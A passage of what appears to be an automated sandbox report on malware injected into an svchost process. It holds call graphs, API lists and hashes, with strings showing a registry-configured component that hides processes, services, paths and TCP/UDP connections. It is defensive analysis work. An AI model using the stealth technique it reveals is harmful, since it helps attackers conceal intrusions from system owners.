15206->15208 15207->15206 15210 179537ae4e1 15207->15210 15376 179537ad570 15208->15376 15211 179537ad6ac __free_lconv_num 5 API calls 15210->15211 15214 179537ae593 15210->15214 15212 179537ae5f1 15211->15212 15213 179537ad570 _invalid_parameter_noinfo 28 API calls 15212->15213 15213->15214 15215 179537ae62d 15214->15215 15216 179537ad744 __free_lconv_num 5 API calls 15214->15216 15215->15027 15216->15215 15218 179537ae1d8 15217->15218 15219 179537ae1d3 15217->15219 15218->15219 15225 179537ace28 15218->15225 15219->15186 15219->15187 15221 179537ae1f3 15260 179537b03fc 15221->15260 15226 179537ace3d __free_lconv_num 15225->15226 15227 179537ace4c FlsGetValue 15226->15227 15228 179537ace69 FlsSetValue 15226->15228 15229 179537ace63 15227->15229 15242 179537ace59 __CxxCallCatchBlock 15227->15242 15230 179537ace7b 15228->15230 15228->15242 15229->15228 15231 179537ad6cc __free_lconv_num 5 API calls 15230->15231 15232 179537ace8a 15231->15232 15233 179537acea8 FlsSetValue 15232->15233 15234 179537ace98 FlsSetValue 15232->15234 15235 179537aceb4 FlsSetValue 15233->15235 15236 179537acec6 15233->15236 15238 179537acea1 15234->15238 15235->15238 15239 179537acb94 __free_lconv_num 5 API calls 15236->15239 15237 179537acee2 15237->15221 15240 179537ad744 __free_lconv_num 5 API calls 15238->15240 15241 179537acece 15239->15241 15240->15242 15243 179537ad744 __free_lconv_num 5 API calls 15241->15243 15242->15237 15244 179537acf28 FlsSetValue 15242->15244 15245 179537acf0d FlsGetValue 15242->15245 15243->15242 15246 179537acf35 15244->15246 15249 179537acf1a 15244->15249 15247 179537acf22 15245->15247 15245->15249 15248 179537ad6cc __free_lconv_num 5 API calls 15246->15248 15247->15244 15250 179537acf44 15248->15250 15249->15221 15251 179537acf62 FlsSetValue 15250->15251 15252 179537acf52 FlsSetValue 15250->15252 15254 179537acf80 15251->15254 15255 179537acf6e FlsSetValue 15251->15255 15253 179537acf5b 15252->15253 15256 179537ad744 __free_lconv_num 5 API calls 15253->15256 15257 179537acb94 __free_lconv_num 5 API calls 15254->15257 15255->15253 15256->15249 15258 179537acf88 15257->15258 15259 179537ad744 __free_lconv_num 5 API calls 15258->15259 15259->15249 15261 179537b0411 15260->15261 15263 179537ae216 15260->15263 15261->15263 15268 179537b0a5c 15261->15268 15264 179537b0468 15263->15264 15265 179537b0490 15264->15265 15266 179537b047d 15264->15266 15265->15219 15266->15265 15277 179537aecf0 15266->15277 15269 179537ace28 _invalid_parameter_noinfo 15 API calls 15268->15269 15270 179537b0a6b 15269->15270 15272 179537b0aa4 15270->15272 15273 179537b0acc 15270->15273 15272->15263 15274 179537b0aeb 15273->15274 15275 179537b0ade Concurrency::details::SchedulerProxy::DeleteThis 15273->15275 15274->15272 15275->15274 15276 179537b07b4 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15275->15276 15276->15274 15278 179537ace28 _invalid_parameter_noinfo 15 API calls 15277->15278 15279 179537aecf9 15278->15279 15281 179537ae7bd GetCPInfo 15280->15281 15290 179537ae8b3 15280->15290 15287 179537ae7d0 15281->15287 15281->15290 15282 179537a7940 _log10_special 3 API calls 15284 179537ae952 15282->15284 15284->15203 15298 179537b1544 15287->15298 15290->15282 15292 179537a7949 15291->15292 15293 179537a7954 15292->15293 15294 179537a812c IsProcessorFeaturePresent 15292->15294 15293->15200 15295 179537a8144 15294->15295 15372 179537a8320 RtlCaptureContext 15295->15372 15297 179537a8157 15297->15200 15299 179537ae1b4 15 API calls 15298->15299 15300 179537b1586 15299->15300 15318 179537af07c 15300->15318 15319 179537af085 MultiByteToWideChar 15318->15319 15373 179537a833a capture_previous_context 15372->15373 15374 179537a8389 15373->15374 15375 179537a8350 RtlVirtualUnwind 15373->15375 15374->15297 15375->15373 15375->15374 15379 179537ad408 15376->15379 15380 179537ad433 15379->15380 15387 179537ad4a4 15380->15387 15382 179537ad45a 15385 179537ad47d 15382->15385 15395 179537ac7a0 15382->15395 15384 179537ad492 15384->15210 15385->15384 15386 179537ac7a0 _invalid_parameter_noinfo 18 API calls 15385->15386 15386->15384 15406 179537ad1ec 15387->15406 15389 179537ad4ce _invalid_parameter_noinfo 15391 179537ad4df _invalid_parameter_noinfo 15389->15391 15410 179537ad590 IsProcessorFeaturePresent 15389->15410 15391->15382 15396 179537ac7f8 15395->15396 15397 179537ac7af __free_lconv_num 15395->15397 15396->15385 15398 179537ad068 _invalid_parameter_noinfo 8 API calls 15397->15398 15399 179537ac7de __CxxCallCatchBlock 15398->15399 15399->15396 15400 179537ac7a0 _invalid_parameter_noinfo 18 API calls 15399->15400 15401 179537ac827 15400->15401 15438 179537b0430 15401->15438 15407 179537ad208 __free_lconv_num 15406->15407 15409 179537ad233 __CxxCallCatchBlock 15406->15409 15415 179537ad068 15407->15415 15409->15389 15411 179537ad5a3 15410->15411 15429 179537ad2a4 15411->15429 15413 179537ad5be _invalid_parameter_noinfo 15414 179537ad5c4 TerminateProcess 15413->15414 15416 179537ad087 FlsGetValue 15415->15416 15417 179537ad09c 15415->15417 15416->15417 15418 179537ad094 15416->15418 15417->15418 15419 179537ad6cc __free_lconv_num 5 API calls 15417->15419 15418->15409 15420 179537ad0be 15419->15420 15421 179537ad0dc FlsSetValue 15420->15421 15425 179537ad0cc 15420->15425 15422 179537ad0e8 FlsSetValue 15421->15422 15423 179537ad0fa 15421->15423 15422->15425 15424 179537acb94 __free_lconv_num 5 API calls 15423->15424 15426 179537ad102 15424->15426 15427 179537ad744 __free_lconv_num 5 API calls 15425->15427 15428 179537ad744 __free_lconv_num 5 API calls 15426->15428 15427->15418 15428->15418 15430 179537ad2de _invalid_parameter_noinfo 15429->15430 15431 179537ad306 RtlCaptureContext 15430->15431 15432 179537ad33b capture_previous_context 15431->15432 15433 179537ad376 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15432->15433 15434 179537ad340 RtlVirtualUnwind 15432->15434 15435 179537ad3c8 _invalid_parameter_noinfo 15433->15435 15434->15433 15436 179537a7940 _log10_special 3 API calls 15435->15436 15437 179537ad3e7 15436->15437 15437->15413 15439 179537b0449 15438->15439 15440 179537ac84f 15438->15440 15439->15440 15441 179537b0a5c _invalid_parameter_noinfo 15 API calls 15439->15441 15442 179537b049c 15440->15442 15441->15440 15443 179537b04b5 15442->15443 15444 179537ac85f 15442->15444 15443->15444 15445 179537aecf0 _invalid_parameter_noinfo 15 API calls 15443->15445 15444->15385 15445->15444 15447 179537ac6ff 15446->15447 15448 179537ac6f5 15446->15448 15449 179537ad6ac __free_lconv_num 5 API calls 15447->15449 15448->15447 15453 179537ac71a 15448->15453 15450 179537ac706 15449->15450 15451 179537ad570 _invalid_parameter_noinfo 28 API calls 15450->15451 15452 179537ac712 15451->15452 15452->14984 15453->15452 15454 179537ad6ac __free_lconv_num 5 API calls 15453->15454 15454->15450 15456 179537ac26d 15455->15456 15460 179537ac225 15455->15460 15457 179537ac296 15456->15457 15458 179537ad744 __free_lconv_num 5 API calls 15456->15458 15459 179537ad744 __free_lconv_num 5 API calls 15457->15459 15458->15456 15459->15460 15460->14982 15461 1795377273c 15463 1795377276a 15461->15463 15462 17953772858 LoadLibraryA 15462->15463 15463->15462 15464 179537728d4 15463->15464 15465 179537a1abc 15470 179537a1628 GetProcessHeap 15465->15470 15467 179537a1ad2 Sleep SleepEx 15468 179537a1acb 15467->15468 15468->15467 15469 179537a1598 StrCmpIW StrCmpW 15468->15469 15469->15468 15471 179537a1648 __free_lconv_num 15470->15471 15515 179537a1268 GetProcessHeap 15471->15515 15473 179537a1650 15474 179537a1268 2 API calls 15473->15474 15475 179537a1661 15474->15475 15476 179537a1268 2 API calls 15475->15476 15477 179537a166a 15476->15477 15478 179537a1268 2 API calls 15477->15478 15479 179537a1673 15478->15479 15480 179537a168e RegOpenKeyExW 15479->15480 15481 179537a18a6 15480->15481 15482 179537a16c0 RegOpenKeyExW 15480->15482 15481->15468 15483 179537a16e9 15482->15483 15484 179537a16ff RegOpenKeyExW 15482->15484 15519 179537a12bc RegQueryInfoKeyW 15483->15519 15485 179537a1723 15484->15485 15486 179537a173a RegOpenKeyExW 15484->15486 15530 179537a104c RegQueryInfoKeyW 15485->15530 15489 179537a1775 RegOpenKeyExW 15486->15489 15490 179537a175e 15486->15490 15494 179537a1799 15489->15494 15495 179537a17b0 RegOpenKeyExW 15489->15495 15493 179537a12bc 13 API calls 15490->15493 15496 179537a176b RegCloseKey 15493->15496 15497 179537a12bc 13 API calls 15494->15497 15498 179537a17d4 15495->15498 15499 179537a17eb RegOpenKeyExW 15495->15499 15496->15489 15502 179537a17a6 RegCloseKey 15497->15502 15503 179537a12bc 13 API calls 15498->15503 15500 179537a1826 RegOpenKeyExW 15499->15500 15501 179537a180f 15499->15501 15505 179537a1861 RegOpenKeyExW 15500->15505 15506 179537a184a 15500->15506 15504 179537a104c 5 API calls 15501->15504 15502->15495 15507 179537a17e1 RegCloseKey 15503->15507 15508 179537a181c RegCloseKey 15504->15508 15510 179537a1885 15505->15510 15511 179537a189c RegCloseKey 15505->15511 15509 179537a104c 5 API calls 15506->15509 15507->15499 15508->15500 15512 179537a1857 RegCloseKey 15509->15512 15513 179537a104c 5 API calls 15510->15513 15511->15481 15512->15505 15514 179537a1892 RegCloseKey 15513->15514 15514->15511 15536 179537b6168 15515->15536 15517 179537a1283 GetProcessHeap 15518 179537a12ae __free_lconv_num 15517->15518 15518->15473 15520 179537a1327 GetProcessHeap 15519->15520 15521 179537a148a RegCloseKey 15519->15521 15525 179537a133e __free_lconv_num 15520->15525 15521->15484 15522 179537a1352 RegEnumValueW 15522->15525 15523 179537a1476 GetProcessHeap HeapFree 15523->15521 15525->15522 15525->15523 15526 179537a13d3 GetProcessHeap 15525->15526 15527 179537a141e lstrlenW GetProcessHeap 15525->15527 15528 179537a13f3 GetProcessHeap HeapFree 15525->15528 15529 179537a1443 StrCpyW 15525->15529 15537 179537a152c 15525->15537 15526->15525 15527->15525 15528->15527 15529->15525 15531 179537a11b5 RegCloseKey 15530->15531 15532 179537a10bf __free_lconv_num 15530->15532 15531->15486 15532->15531 15533 179537a10cf RegEnumValueW 15532->15533 15534 179537a114e GetProcessHeap 15532->15534 15535 179537a116e GetProcessHeap HeapFree 15532->15535 15533->15532 15534->15532 15535->15532 15538 179537a157c 15537->15538 15541 179537a1546 15537->15541 15538->15525 15539 179537a1565 StrCmpW 15539->15541 15540 179537a155d StrCmpIW 15540->15541 15541->15538 15541->15539 15541->15540

                                                              Executed Functions

                                                              Function 00000179537A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: e4bf16918a7cacbca0db979268ad85abf1fead3538016a29a4f8caa0c503e4bd
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 6AE06D35A0161886EB058F62D82838A37F1FB8AF0AF04C024CA8D47351EF7D8499C750
                                                              Function 00000179537AF1EC Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                              • String ID:
                                                              • API String ID: 3331406755-0
                                                              • Opcode ID: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                              • Instruction ID: e89af08d413403d6e5d7482309db2184f3715486d0e1cd70b0b3824db1cad727
                                                              • Opcode Fuzzy Hash: 987753ff894a599cb567346e89517f1ee9597d4cd7e0ed4d9062b173d8f816d4
                                                              • Instruction Fuzzy Hash: 4C31B431A6876081EA269F226C502DE77B4B786BD8F48422BEA9E43BC5DF38C5458704
                                                              Function 00000179537A328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: ca808a076cef636c667c28671c52d662c11ceeea05346f25545d2e4f9369c430
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 5F116130E3C66482FB629FB1F8557D923B4E76A34DF544127DA4E42B91EF78C04C8610
                                                              Function 00000179537A1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000179537A1628: GetProcessHeap.KERNEL32 ref: 00000179537A1633
                                                                • Part of subcall function 00000179537A1628: HeapAlloc.KERNEL32 ref: 00000179537A1642
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16B2
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DF
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A16F9
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1719
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1734
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1754
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A176F
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A178F
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17AA
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17CA
                                                              • Sleep.KERNEL32 ref: 00000179537A1AD7
                                                              • SleepEx.KERNELBASE ref: 00000179537A1ADD
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A17E5
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1805
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1820
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1840
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A185B
                                                                • Part of subcall function 00000179537A1628: RegOpenKeyExW.ADVAPI32 ref: 00000179537A187B
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A1896
                                                                • Part of subcall function 00000179537A1628: RegCloseKey.ADVAPI32 ref: 00000179537A18A0
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: b6c2e1d6c864596a4c04fdf18bbbf5071076cb135f023add6302ffefab344da2
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 04313271F2866582FF529B36DA413E923F4AB46BC8F8854239E0D873D5FF24C859C610
                                                              Function 00000179537A3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 89 179537a3844-179537a384f 90 179537a3851-179537a3864 StrCmpNIW 89->90 91 179537a3869-179537a3870 89->91 90->91 92 179537a3866 90->92 92->91
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dialer
                                                              • API String ID: 0-3528709123
                                                              • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction ID: dbbf6158d5080c7e4a12ec2d32b33ddd1bdad48742ffa41caff3c02827982d81
                                                              • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                              • Instruction Fuzzy Hash: 7AD0A770B252558BFF56DFE688D46E02370EB0974CF884032C90802750EB1CD98DA720
                                                              Function 000001795377273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 93 1795377273c-179537727a4 call 179537729d4 * 4 102 179537727aa-179537727ad 93->102 103 179537729b2 93->103 102->103 104 179537727b3-179537727b6 102->104 105 179537729b4-179537729d0 103->105 104->103 106 179537727bc-179537727bf 104->106 106->103 107 179537727c5-179537727e6 106->107 107->103 109 179537727ec-1795377280c 107->109 110 1795377280e-17953772836 109->110 111 17953772838-1795377283f 109->111 110->110 110->111 112 179537728df-179537728e6 111->112 113 17953772845-17953772852 111->113 115 179537728ec-17953772901 112->115 116 17953772992-179537729b0 112->116 113->112 114 17953772858-1795377286a LoadLibraryA 113->114 117 1795377286c-17953772878 114->117 118 179537728ca-179537728d2 114->118 115->116 119 17953772907 115->119 116->105 120 179537728c5-179537728c8 117->120 118->114 121 179537728d4-179537728d9 118->121 123 1795377290d-17953772921 119->123 120->118 124 1795377287a-1795377287d 120->124 121->112 125 17953772923-17953772934 123->125 126 17953772982-1795377298c 123->126 129 1795377287f-179537728a5 124->129 130 179537728a7-179537728b7 124->130 127 1795377293f-17953772943 125->127 128 17953772936-1795377293d 125->128 126->116 126->123 133 1795377294d-17953772951 127->133 134 17953772945-1795377294b 127->134 132 17953772970-17953772980 128->132 135 179537728ba-179537728c1 129->135 130->135 132->125 132->126 136 17953772963-17953772967 133->136 137 17953772953-17953772961 133->137 134->132 135->120 136->132 139 17953772969-1795377296c 136->139 137->132 139->132
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070231267.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_17953770000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: aa063f8f75c6740ade699a4d29bdcc33ceee5f26798b0015945cd0de14dc5192
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: E6613532F096A087DB56CF15D0007ADB3F2F756BA8F188122CE6D17788DA38D866DB00

                                                              Non-executed Functions

                                                              Function 00000179537A2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 399 179537a2b2c-179537a2ba5 call 179537c2ce0 402 179537a2bab-179537a2bb1 399->402 403 179537a2ee0-179537a2f03 399->403 402->403 404 179537a2bb7-179537a2bba 402->404 404->403 405 179537a2bc0-179537a2bc3 404->405 405->403 406 179537a2bc9-179537a2bd9 GetModuleHandleA 405->406 407 179537a2bdb-179537a2beb call 179537b6090 406->407 408 179537a2bed 406->408 409 179537a2bf0-179537a2c0e 407->409 408->409 409->403 413 179537a2c14-179537a2c33 StrCmpNIW 409->413 413->403 414 179537a2c39-179537a2c3d 413->414 414->403 415 179537a2c43-179537a2c4d 414->415 415->403 416 179537a2c53-179537a2c5a 415->416 416->403 417 179537a2c60-179537a2c73 416->417 418 179537a2c83 417->418 419 179537a2c75-179537a2c81 417->419 420 179537a2c86-179537a2c8a 418->420 419->420 421 179537a2c8c-179537a2c98 420->421 422 179537a2c9a 420->422 423 179537a2c9d-179537a2ca7 421->423 422->423 424 179537a2d9d-179537a2da1 423->424 425 179537a2cad-179537a2cb0 423->425 428 179537a2ed2-179537a2eda 424->428 429 179537a2da7-179537a2daa 424->429 426 179537a2cc2-179537a2ccc 425->426 427 179537a2cb2-179537a2cbf call 179537a199c 425->427 431 179537a2d00-179537a2d0a 426->431 432 179537a2cce-179537a2cdb 426->432 427->426 428->403 428->417 433 179537a2dbb-179537a2dc5 429->433 434 179537a2dac-179537a2db8 call 179537a199c 429->434 439 179537a2d0c-179537a2d19 431->439 440 179537a2d3a-179537a2d3d 431->440 432->431 438 179537a2cdd-179537a2cea 432->438 435 179537a2dc7-179537a2dd4 433->435 436 179537a2df5-179537a2df8 433->436 434->433 435->436 442 179537a2dd6-179537a2de3 435->442 443 179537a2e05-179537a2e12 lstrlenW 436->443 444 179537a2dfa-179537a2e03 call 179537a1bbc 436->444 445 179537a2ced-179537a2cf3 438->445 439->440 446 179537a2d1b-179537a2d28 439->446 447 179537a2d4b-179537a2d58 lstrlenW 440->447 448 179537a2d3f-179537a2d49 call 179537a1bbc 440->448 450 179537a2de6-179537a2dec 442->450 456 179537a2e14-179537a2e1e 443->456 457 179537a2e35-179537a2e3f call 179537a3844 443->457 444->443 461 179537a2e4a-179537a2e55 444->461 454 179537a2d93-179537a2d98 445->454 455 179537a2cf9-179537a2cfe 445->455 458 179537a2d2b-179537a2d31 446->458 451 179537a2d7b-179537a2d8d call 179537a3844 447->451 452 179537a2d5a-179537a2d64 447->452 448->447 448->454 450->461 462 179537a2dee-179537a2df3 450->462 451->454 466 179537a2e42-179537a2e44 451->466 452->451 463 179537a2d66-179537a2d79 call 179537a152c 452->463 454->466 455->431 455->445 456->457 467 179537a2e20-179537a2e33 call 179537a152c 456->467 457->466 458->454 468 179537a2d33-179537a2d38 458->468 470 179537a2e57-179537a2e5b 461->470 471 179537a2ecc-179537a2ed0 461->471 462->436 462->450 463->451 463->454 466->428 466->461 467->457 467->461 468->440 468->458 476 179537a2e63-179537a2e7d call 179537a85c0 470->476 477 179537a2e5d-179537a2e61 470->477 471->428 480 179537a2e80-179537a2e83 476->480 477->476 477->480 483 179537a2e85-179537a2ea3 call 179537a85c0 480->483 484 179537a2ea6-179537a2ea9 480->484 483->484 484->471 486 179537a2eab-179537a2ec9 call 179537a85c0 484->486 486->471
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: a68df60460c540e5a9242f56c6b8bfc5263ec75fa9e1868138209c41af1d70d8
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 0BB1BF72A28AA092EB6A8F25C4447E963B5F74AB8CF445017EE4D53B95EF35CCC8C740
                                                              Function 00000179537A7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 58b78ca673e8f1c025eb56569f683145776f8da21aff7224e17a305cb7f8da99
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: FC317072619B908AEB619F60E8503EE7371F785748F44402ADB8D57B94EF38C54CC714
                                                              Function 00000179537AD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: fac0d66ec64c3925cbc38e830e94581c1ed51f6a25e90594bb5b961479521937
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: C8315F32618B9096EB61CF25E8503DE73B4F78A758F540126EA9D53B94EF38C659CB00
                                                              Function 00000179537A1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 206c1a27e464331c4bd0b9a092aeafa2340499ab111ab09f1a96645441c587cd
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: A371F136B18A2485FB11AF66E8A0ADD3374F786B8CF401122DE4E57B69EF38C548C744
                                                              Function 00000179537A12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 6227fafc9fbf8ae47cd58b7f6cf4b5d99e6e7defb89df161162dad1074e44a04
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 83517C72A18B9886EB51CF66E45839A77B1F38AF89F444126DE8D47718EF3CC049CB00
                                                              Function 00000179537A1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
